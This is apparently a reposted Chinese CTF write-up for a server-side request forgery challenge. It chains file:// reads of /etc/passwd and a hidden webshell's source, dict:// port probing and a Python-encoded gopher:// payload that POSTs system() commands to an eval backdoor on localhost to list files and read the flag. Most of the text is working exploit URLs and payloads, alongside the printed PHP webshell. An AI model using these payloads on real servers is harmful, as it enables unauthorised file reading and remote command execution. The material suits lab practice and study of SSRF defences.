ssrf漏洞 CTF

其他 2020-08-12 10:08:16 阅读次数: 0

扫描

/index.php

/robots.txt

User-agent: *
Disallow: /webshe11231231231.php

http://*:8016/index.php?url=www.baidu.com

http://*:8016/index.php?url=file:///etc/passwd  读取文件

http://*:8016/index.php?url=file:///var/www/html

http://*:8016/index.php?url=file:///usr/share/html

http://*:8016/index.php?url=file:///var/www/html/webshe11231231231.php

<?php

$serverList = array(
    "127.0.0.1"
);
$ip = $_SERVER['REMOTE_ADDR'];
foreach ($serverList as $host) {
    if ($ip === $host) {
        if ((!empty($_POST['admin'])) and $_POST['admin'] === 'h1admin') {
            @eval($_POST['hacker']);
        } else {
            die("You aren't admin!");
        }
    } else {
        die('This is webshell');
    }
}

需要在本地进行访问,所以

在repeater里面右上角设置target 127.0.0.1 80

GET /index.php?url=file:///var/www/html/webshe11231231231.php 

改为

GET //webshe11231231231.php 

POST //webshe11231231231.php 

hacker=phpinfo();&admin=h1admin

hacker=system('ls')&admin=h1admin

坑比较多,首先你必须要添加 上面这种命令,另外你还需要对post进行定义

Content-Type:application/x-www-form-urlencoded
Content-Length: 34  长度和上述字符一致

http://*:8016/index.php?url=dict:///127.0.0.1:80 探测端口

gopher协议进行打包发送  利用本地shell

tmp=urllib.quote(test)

new =temp.replace(''%0A","%0D%0A")       ##               /r/n    /r

result='_'+urllib.quote(new)                          ##  第一个包是无效的

print(result)

进行转码,然后直接

_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A
view-source:http://*:8016/index.php?url=gopher://127.0.0.1:80/_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A
_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A
_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527cat%2520fl1234aaaaaggggg.php%2527%2529%253B%250D%250A
http://*:8016/?url=gopher://127.0.0.1:80/_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527cat%2520fl1234aaaaaggggg.php%2527%2529%253B%250D%250A

猜你喜欢

转载自blog.csdn.net/zb0567/article/details/105660231
今日推荐
周排行
深度学习------Lingvo框架下的加速通道GPipe
webjars管理静态资源
C专家编程_2.2
mysql 源码安装
json文件操作
123231432
注解的实现
Spring MVC 控制器
《人月神话》读后感二
C#使用HttpWebRequest和HttpWebResponse上传文件示例
每日归档
更多
2024-09-08(0)
2024-09-07(0)
2024-09-06(0)
2024-09-05(0)
2024-09-04(0)
2024-09-03(0)
2024-09-02(0)
2024-09-01(0)
2024-08-31(0)
2024-08-30(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022